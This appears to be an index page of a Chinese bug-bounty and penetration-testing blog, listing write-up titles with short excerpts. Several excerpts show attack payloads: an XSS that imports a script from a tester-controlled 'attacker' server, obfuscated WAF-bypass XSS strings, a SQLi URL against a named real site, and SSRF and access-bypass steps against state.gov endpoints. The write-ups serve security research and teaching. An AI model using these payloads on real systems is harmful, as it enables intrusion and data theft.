全部安全开发新闻数码摄影汽车北京AIIT其他
  • 文章封面

    Chrome V8 沙箱逃逸漏洞

    作者:迪哥讲事发布日期:2026-07-03 12:00:00

    声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。防走失:https://gugesay.c

    阅读全文
  • 文章封面

    白盒审计出的一个RCE

    作者:迪哥讲事发布日期:2026-07-02 12:00:00

    正文出问题的代码:if (url == null || !url.startsWith("http")){ logger.warn("Not a valid URL to open:" + ur

    阅读全文
  • 文章封面

    第一个高危漏洞

    作者:迪哥讲事发布日期:2026-07-01 11:45:00

    免责声明由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号陌笙不太懂安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删

    阅读全文
  • 文章封面

    阿里云临时安全凭证STS利用

    作者:迪哥讲事发布日期:2026-06-30 11:00:00

    免责声明由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号陌笙不太懂安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删

    阅读全文
  • 文章封面

    一个有意思的xss

    作者:迪哥讲事发布日期:2026-06-29 11:00:00

    正文payload如下:<Img Src=//x55.js OnLoad=import(src)>x55.js可以设置为你自己的服务器地址一个完整的测试示例 假设你的 VPS 地址是 attacker

    阅读全文
  • 文章封面

    用AI挖了隐藏N年的组合拳漏洞

    作者:迪哥讲事发布日期:2026-06-26 11:00:00

    前言这个漏洞是在护网中发现的,感觉很有学习价值,于是复盘了一下,花费一天时间,根据漏洞细节,在本地一比一复刻漏洞环境,以供学习。这篇内容较多,先放目录,细细品味启动靶场一、初步测试弱口令登录尝试首先访

    阅读全文
  • 文章封面

    一个xss

    作者:迪哥讲事发布日期:2026-06-25 11:00:00

    正文触发漏洞的请求如下POST /██████/███████-historic.cfm HTTP/1.1Host: █████████Cookie: CFID=29878711; CFTOKEN=7

    阅读全文
  • 文章封面

    通过改变请求方法实现权限绕过

    作者:迪哥讲事发布日期:2026-06-24 11:00:00

    正文假设存在一条企业全域共享:用户可从该共享中转存文件,但无法直接下载。举例说明:用户 1 创建文件夹共享,开启二次转发权限、关闭下载权限,共享 ID 为 10,并分享给用户 2;用户 2 再将该文件

    阅读全文
  • 文章封面

    5000刀的高危burp漏洞

    作者:迪哥讲事发布日期:2026-06-23 11:00:00

    声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。最近看到hackerone上的一篇赏金报告,还挺有意思的,于是记录一下,这种类似的攻击手法其实还挺多的,包

    阅读全文
  • 文章封面

    $7,000高危漏洞披露

    作者:迪哥讲事发布日期:2026-06-22 11:00:00

    声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。“最危险的地方往往是最安全的地方。” 近日

    阅读全文
  • 文章封面

    重置2FA导致的账户劫持

    作者:迪哥讲事发布日期:2026-06-19 12:00:00

    正文复现步骤(Steps to Reproduce)在账户上启用 2FA。登出账户。再次登录。不输入 TOTP(动态验证码)。点击:“Reset two-factor authentication”点

    阅读全文
  • 文章封面

    离谱的重定向

    作者:迪哥讲事发布日期:2026-06-18 11:00:00

    正文正常请求:GET /?logout=1 HTTP/2Host: www.expedia.comCookie: { REDACTED }User-Agent: Mozilla/5.0 (Window

    阅读全文
  • 文章封面

    折扣逻辑漏洞

    作者:迪哥讲事发布日期:2026-06-17 11:00:00

    正文Stripe 给我提供了一项 20,000 美元的交易手续费减免优惠(fee discount)这个接口存在并发问题使用了 Burp Turbo Intruder 对下面这个接口进行了并发攻击:/

    阅读全文
  • 文章封面

    AI会扼杀漏洞赏金产业吗?

    作者:迪哥讲事发布日期:2026-06-16 11:00:00

    声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。导语过去十几年,Bug Bounty 一直

    阅读全文
  • 文章封面

    一个有意思的xss

    作者:迪哥讲事发布日期:2026-06-15 10:00:00

    正文payload:https://travel.state.gov/content/travel/en/search.html/?search_input=hello&data-sia=false&

    阅读全文
  • 文章封面

    让AI直接操作Burp做漏洞分析

    作者:迪哥讲事发布日期:2026-06-12 11:00:00

    最近抽空看了一下PortSwigger官方出的Burp MCP服务,整体感觉一些繁琐的事情确实可以结合MCP让AI直接操作Burp去分析,不用再重度依赖人工核验。言归正传,Burp MCP官方Gith

    阅读全文
  • 文章封面

    绕过权限

    作者:迪哥讲事发布日期:2026-06-11 11:00:00

    正文绕过权限发现访问该接口地址 https://████████/███/?#/ 时,用户必须输入密码 / 通行密钥才能进入。输入错误密码后,页面会弹出报错提示,提示内容为:如需密码相关协助,请联系█

    阅读全文
  • 文章封面

    一个典型的sqli

    作者:迪哥讲事发布日期:2026-06-10 11:00:00

    正文一个典型的sqlipayload如下:http://ticketapi.video.qq.com/get_bonus?otype=json&callback=jQuery1910212066221

    阅读全文
  • 文章封面

    [文末抽奖]猎手小屋+海外SRC实战预备营正式上线!

    作者:迪哥讲事发布日期:2026-06-09 12:00:00

    猎手小屋 x 海外SRC预备营 上线啦!在不确定的漏洞世界里,建立一条确定的成长路径01 行业趋势Apple 漏洞赏金计划提高上限到 200 万美元(不包括额外奖励)。即便是长期被全球用户视为极其安

    阅读全文
  • 文章封面

    绕过waf的一个xss

    作者:迪哥讲事发布日期:2026-06-08 11:00:00

    正文某日看到的一个思路<mctx%2FOnCoNtEnTvIsIbIlItYaUtOsTaTeChAnGe%3Dalert%601%61%09STYLE%3Ddisplay%3Ablock%3Bcon

    阅读全文
  • 文章封面

    某医院小程序逆向签名加解密之泄露百万数据

    作者:迪哥讲事发布日期:2026-06-05 11:00:00

    首先登录小程序,发现数据是密文,还有签名,这就很头大啊 再大也要干,反编译小程序,格式化 js 代码,全局搜索签名字段,发现了疑似代码实现 source: n.source,version: n.ve

    阅读全文
  • 文章封面

    有些漏洞不需要技巧,只需要开发相信用户

    作者:迪哥讲事发布日期:2026-06-04 11:00:00

    声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。开局还是熟悉的登录系统,没错~这依旧是之前的一次授权测试,要求依旧简单,只需要简简单单的排查一下就OK啦。

    阅读全文
  • 文章封面

    ssrf绕过

    作者:迪哥讲事发布日期:2026-06-03 11:00:00

    正文发现 geonode.state.gov/proxy/?url= 这个接口的服务端 SSRF 防护存在配置错误该接口使用白名单保护机制,确保 url 参数中只请求允许的域名。例如,url=geon

    阅读全文
  • 文章封面

    【SRC实战】一次XSS三次绕过的真实记录

    作者:迪哥讲事发布日期:2026-06-02 11:00:00

    📝 编者语很多人对XSS还停留在alert(1)的阶段,所以在真实场景中很难出货。因为在真实场景中往往需要面对:关键字过滤Script 拦截语法环境限制特殊字符过滤这篇文章完整记录了三次不同的XSS绕

    阅读全文
  • 文章封面

    xss实战绕过

    作者:迪哥讲事发布日期:2026-06-01 11:00:00

    正文原始载荷:0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>HTML 实体编码:0xd3adc0de&lt;ScRiPt&gt;alert('XSS

    阅读全文
  • 文章封面

    通过越权实现的高危

    作者:迪哥讲事发布日期:2026-05-29 11:00:00

    正文以下接口缺少服务端权限校验:GET /voyager/api/voyagerPublishingDashSeriesSubscribers?decorationId=com.linkedin.vo

    阅读全文
  • 文章封面

    权限绕过思路

    作者:迪哥讲事发布日期:2026-05-28 11:00:00

    正文复现步骤: 登录 https://speakerkit.state.gov/系统会将你跳转到名为 “spklogin” 的页面。我使用 Burp Suite 的查找替换功能,将所有返回 302 F

    阅读全文
  • 文章封面

    RCE漏洞

    作者:迪哥讲事发布日期:2026-05-27 11:00:00

    声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。这原本是一个调试端点信息泄露问题,最终升级

    阅读全文
  • 文章封面

    通过缓存投毒导致的 XSS 接管账号

    作者:迪哥讲事发布日期:2026-05-26 11:00:00

    正文通过缓存投毒导致的 XSS 接管账号。原因是:hav Cookie 会被反射到这个响应里:https://www.abritel.fr/annonces/location-vacances/fra

    阅读全文
  • 文章封面

    任意用户密码重置

    作者:迪哥讲事发布日期:2026-05-25 11:00:00

    声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。这是挺久之前的一次授权渗透测试,回想起来还是有点小取巧,哈哈~二话不说,直接开始正文。目标功能齐全,注册啥

    阅读全文
下一页